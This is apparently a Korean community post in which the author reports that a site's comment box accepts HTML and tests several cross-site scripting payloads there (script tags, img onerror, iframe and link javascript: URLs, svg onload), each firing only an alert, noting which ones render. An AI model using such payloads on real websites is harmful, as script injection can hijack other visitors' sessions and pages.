<br>이나 인식시키려고 textarea 태그의 HTML을 허용한걸로 보이는데
순간 다른 분의 글에 댓글 달다가 발견..
내용은 댓글로 확인해주세요..
각종 테스트 댓글로 진행해볼 예정
<script>alert('XSS 테스트')</script>
<img src=x onerror="alert('이미지 onerror 테스트')">
<iframe src="javascript:alert('iframe javascript 실행')"></iframe>
<a href="javascript:alert('링크 클릭 시 실행')">클릭 시 자바스크립트 실행</a>
<svg onload="alert('SVG onload 실행')"></svg>
사용된 코드입니다.
<script>alert('XSS 테스트')</script>

script태그는 인식되지만 내부 코드는 인식되지 않음. PASS
<img src=x onerror="alert('이미지 onerror 테스트')">

인식됨.
<iframe src="javascript:alert('iframe javascript 실행')"></iframe>

인식됨.
<a href="javascript:alert('링크 클릭 시 실행')">클릭 시 자바스크립트 실행</a>

인식됨.
<svg onload="alert('SVG onload 실행')"></svg>

코드는 인식되지만 실행은 되지 않음.